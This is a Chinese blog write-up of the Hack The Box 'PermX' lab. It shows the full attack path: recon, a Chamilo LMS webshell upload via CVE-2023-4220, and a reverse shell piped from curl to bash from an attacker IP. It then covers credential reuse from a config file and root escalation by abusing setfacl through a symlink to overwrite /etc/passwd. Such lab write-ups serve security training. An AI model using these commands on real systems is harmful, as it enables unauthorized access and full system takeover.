PermX-htb

最新推荐文章于 2024-08-14 21:17:33 发布
最新推荐文章于 2024-08-14 21:17:33 发布
阅读量794 收藏 20
点赞数 25
分类专栏: HTB 文章标签: 网络 网络安全 web安全 安全 hack the box htb-PermX
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whale_waves/article/details/140920314
版权

0x01 立足

信息收集

端口扫描

nmap -sSCV -Pn 10.10.11.23

正常开启22和80端口

访问web页面

并没有看到有攻击点

这个页面可先记录一会儿有需要的话可以尝试xss获取cookie

域名扫描

ffuf -w 1.txt -u http://permx.htb/ -H 'Host:FUZZ.permx.htb'

这里用的ffuf扫描工具

扫出了lms子域名

访问lms.permx.htb

访问前先写入hosts文件

windows

linux

这里能看到应该是个系统后台登录

先记录

  1. 是个chamilo的框架,可尝试nday
  2. 可尝试sql注入
  3. 可尝试弱口令
  4. 存在遗忘密码界面,可尝试逻辑漏洞

目录扫描

扫一下子域名目录,顺便基础渗透测试

访问/.bowerrc目录出现一个路径

/app/Resources/public/assets/

再次访问发现出现目录遍历

翻找一圈以后并没有找到利用点

搜索框架看是否存在nday

这里似乎存在CVE-2023-4220

看这个nday的攻击点似乎是在此路径下,去出现目录遍历的地方看是否存在攻击点

访问此路径

/main/inc/lib/javascript/bigupload/files/ 

这里能看到存在上传点以及存在别人上传的后门文件

把poc拉取下来

python3 main.py -u http://lms.permx.htb -a webshell

成功上传shell   kk

这里后续可以继续用poc拿shell这里我是直接执行命令弹shell

可执行命令

尝试反弹shell

这里我用curl反弹shell

curl%2010.10.16.4|bash

拿到shll(注意关闭防火墙如果使用虚拟机的话)

0x02 拿到用户权限

看一下etc/passwd

从这里看有存在的用户只有root和mtz,需要想办法登录mtz

这里在app/config/configuration.php发现敏感信息

发现mysql登录账密
用户:chamilo

密码:03F6lY3uXAP2bkW8

数据库:chamilo

尝试登录mysql

是用chamilo数据库

show tables;

查看数据表有哪些发现存在user表直接访问

存在admin和anon的用户以及密码并没有看到mtz

这里会出现一个问题,找不到密码,数据库里的密码破解出来也登陆不上mtz,后来试了下数据库的密码成功登上了,这个就类似于密码喷洒。

成功登录

0x03 提权

sudo -l看有那些此用户能以root权限使用的程序

这里能看到这里存在一个acl.sh的bash命令文件

查看一下

简单来说这里就是过滤传入参数

最后以sudo执行setfacl命令来更改此文件此用户的权限

首先会接入三个参数需要修改的用户、需要修改的权限、以及需要修改权限的文件


然后会对想修改的文件进行三次判断

  1. 必须是/home/mtz文件下
  2. 不能有..
  3. 必须是文件

这里我原本想到的两个绕过方法都给禁了,软链接和../

#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"

软链接绕过

这里尝试了一会儿

利用使用目录创建软链接来绕过他要求只能是文件的过滤

比如说:

平时的软连接是    ln -s /etc/123

/home/123/123    >>  /etc/123

直接使用etc作为软链接    ln -s /etc

/home/123/etc/123    >>    /etc/123

直接拿’/‘跟目录创建软链接或者/etc/创建软链接,如果想直接把root/root.txt创建软链接的话,执行该权限的命令时他会告诉你无法访问没有权限,但是etc文件是可以访问的,直接使用

生成密码

openssl passwd 123456

创建软链接

ln -s /etc

修改权限

sudo /opt/acl.sh mtz rwx /home/mtz/etc/passwd

添加特权用户

echo '123456:$1$mixgqSMG$LOoNrVvfTa2RjhLEFJNQ00:0:0:root:/root:/bin/bash' > /home/mtz/etc/passwd

最后登录123456密码123456

怪兽不会rap_哥哥我会crash
关注
  • 25
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[渗透测试学习] PermX-HackTheBox
rev1ve的博客
08-01 172
路径下以及防止目录穿越,最后就是目标必须是文件。由于是www-data的shell没什么权限,在本机开启http服务。开始是在阿里云漏洞库找并没有收获,后面去CVE官网找到可利用漏洞。如果存在的话,就可以允许将任意文件上传到Web根目录下的。,然后修改root用户对应的密码即可提升至root权限。su切换到root用户,得到root的flag。这里网上找了篇利用漏洞的文章,按照文章打就行。下对应用户为mtz,尝试用数据库密码登录。登陆成功,拿到user的flag。访问马的上传路径,成功命令执行。
htb_PermX
weixin_62621015的博客
07-11 373
hack the box linux
HTB-Permx靶机笔记
LINGX5的博客
08-11 866
我们用nmap扫描,探测出了目标服务有http和ssh服务,对http服务进行子域名枚举,在它的旁站中,我们发现他是一个cms的架构在github上找到了chamilo框架的CVE-2023-4220漏洞,根据github上的教程利用exp,成功后的了www-data用户权限。在chamilo框架的配置文件中,我们发现mysql数据库的配置信息,可以成功登陆数据库,但是admin的密码是hash值很难破解。
Clicker-htb
whale_waves的博客
06-06 751
从这里大致可以知道有web服务使用了rpcbind,是一种通信协议,允许客户端调用远程服务器上的程序或服务。简单来说RPC绑定服务充当了一个服务目录的角色,帮助客户端定位远程RPC服务的端口,从而使客户端能够与服务器进行通信这里所需要注意的是开启的nfs共享NFS共享是在NFS服务器上定义的文件系统或目录,可以被客户端挂载并访问。
Hack The Box-PermX
m0_52742680的博客
07-08 1939
HackTheBox S5赛季靶场第十二篇
从0开始学渗透----HTB----Meow
yangmahaonan的博客
11-27 495
可以看到靶机只开放了23端口的talnet服务,查询可知Telnet是一种默认不加密的不安全协议,可以通过它连接到本地网络中的其他系统。这里我们选择第34个:auxiliary/scanner/telnet/telnet_login。接着我们尝试常见弱密码:admin/administrator/root或者空白登录。(两个txt文件都是自己写上去几个的,如果用正常字典的话跑的太慢啦!爆破成功得到用户名root,用telnet登录即可。查看文件成功拿到flag.ping通了进行下一步。
靶场笔记-HTB Encoding
Timerings的博客
02-17 218
Hack The Box实战靶场,Encoding靶机,HTB官方难度评级为medium,涉及知识点:php代码审计,LFI漏洞,SSRF利用,.git源码泄露及利用,PHP filters chain RCE技术,sudo提权等。
从0开始学渗透----HTB----Fawn
yangmahaonan的博客
11-29 988
这里显示了vsFTPd 3.0.3是ftp版本,存在弱口令漏洞,我们直接输入name=FTP password=FTP。21端口上的ftp服务存在未授权访问,我们先连接到ftp服务器。该靶机开放21端口的ftp服务。
从0开始学渗透----HTB----Redeemer
yangmahaonan的博客
11-30 472
在 Redis 中,数据是以键值对的形式存储的,而不是文件。靶机开放了6379端口的redis服务器,redis常见漏洞如下。
armageddon-htb
04-01
【压缩包子文件的文件名称列表】:“armageddon-htb-main”可能是这个挑战的主要资料或配置文件,包含了攻防过程中所需的详细信息,如IP地址、初始凭证、端口扫描结果、漏洞利用脚本、系统日志等。挑战者可能需要...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
The-Waitlisted-HtB
05-04
等待名单的HtB 一个与语言交换伙伴匹配的Web应用程序
T-HTB manager-开源
05-03
T-HTB免费网络界面,内置PHP,简单的Java脚本,Ajax,嵌套集模型MySQL,rrd图,使用iptables创建tc命令CLASSIFY
计算机网络面试题汇总
最新发布
Blocking The Sky
08-14 680
数字证书是指在互联网通讯中标志通讯各方身份信息的一个数字认证,人们可以在网上用它来识别对方的身份。它的出现,是为了避免身份被篡改冒充的。比如Https的数字证书,就是为了避免公钥被中间人冒充篡改。数字证书构成公钥和个人等信息,经过Hash摘要算法加密,形成消息摘要;将消息摘要拿到拥有公信力的认证中心(CA),用它的私钥对消息摘要加密,形成数字签名。公钥和个人信息、数字签名共同构成数字证书。
HAProxy基本配置及参数实操
Webston的博客
08-12 934
静态#动态#以下静态和动态取决于hash_type 是否consistentfirst #使用较少static-rr #做了session 共享的web集群leastconn #数据库source#基于客户端公网IP 的会话保持Uri--------------->http #缓存服务器,CDN服务商,蓝汛、百度、阿里云、腾讯url_param--------->http #可以实现session 保持hdr #基于客户端请求报文头部做下一步处理高。
mpls vpn基础实验
wudongfang666的专栏
08-10 496
场景:异地两个站点通过mpls vpn骨干网络实现安全通讯虚拟路由转发 VRF ,相当于在设备内建立一条虚拟通道,一个vpn的实例(vrf)可以简单的理解为一台虚拟设备。拓扑图。
48天笔试训练错题——day44
ミカミミミ博客
08-08 845
48天笔试训练错题——day44.
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怪兽不会rap_哥哥我会crash

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值